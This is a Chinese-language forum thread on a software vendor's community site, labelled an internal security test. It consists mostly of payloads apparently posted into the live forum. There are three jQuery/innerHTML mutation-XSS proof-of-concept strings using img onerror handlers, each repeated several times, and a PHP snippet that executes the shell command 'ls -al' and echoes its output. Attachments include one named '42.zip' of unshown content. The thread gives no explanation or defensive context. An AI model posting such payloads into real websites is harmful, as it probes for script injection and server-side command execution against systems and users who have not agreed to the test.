找文章 / 找答案
  • 发帖数5
  • 粉丝0

此人很懒,什么也没有留下

    精选问答 更多内容

    [报错信息处理] Joselai-内部安全测试

    永洪tech-jose玄铁一 显示全部楼层 发表于 2023-4-25 16:20:47 |阅读模式 打印 上一主题 下一主题
    1
    未解决
    本帖最后由 永洪tech-jose 于 2023-4-26 10:35 编辑

    这个是用于内部安全测试,管理员可以忽略


    PoC 1Assign to innerHTML Append via .html()
    <style><style /><img src=x onerror=alert(1)>
    1. <style><style /><img src=x onerror=alert(1)>
    复制代码

    PoC 2 (Only jQuery 3.x affected)Assign to innerHTML Append via .html()
    <img alt="<x" title="/><img src=x onerror=alert(1)>">
    1. <img alt="<x" title="/><img src=x onerror=alert(1)>">
    复制代码

    PoC 3Assign to innerHTML Append via .html()
    <option><style></option></select><img src=x onerror=alert(1)></style>
    1. <option><style></option></select><img src=x onerror=alert(1)></style>
    复制代码




    <style><style /><img src=x onerror=alert(1)>

    <style><style /><img src=x onerror=alert(1)>

    hive-jdbc-1.1.0-standalone.jar

    17.41 MB, 下载次数: 183

    42.zip

    41.79 KB, 下载次数: 1668

    回复

    使用道具 举报

    精彩评论3

    永洪tech-jose玄铁一 显示全部楼层 发表于 2023-4-26 10:40:26
    <?php
    $output = `ls -al`;
    echo "<pre>$output</pre>";
    ?>
    回复

    使用道具 举报

    永洪tech-jose玄铁一 显示全部楼层 发表于 2023-4-26 10:57:11
    <style><style /><img src=x onerror=alert(1)>
    <img alt="<x" title="/><img src=x onerror=alert(1)>">
    <option><style></option></select><img src=x onerror=alert(1)></style>


    回复

    使用道具 举报

    永洪tech-jose玄铁一 显示全部楼层 发表于 2023-4-26 17:09:20
    zip

    42.zip

    41.79 KB, 下载次数: 0

    回复

    使用道具 举报

    高级模式
    您需要登录后才可以回帖 登录 | 免费注册

    • 官方微信

      欢迎关注永洪服务号!收费为0,价值无限

      扫码关注
    • 新浪微博

      让每位用户轻松挖掘数据价值!

      访问新浪微博
    • 智能客服
    50W

    会员等你来哦

    Copyright   ©2012-2024  北京永洪商智科技有限公司  (京ICP备12050607) 京公网安备110110802011451号 |《永洪社区协议》
    返回顶部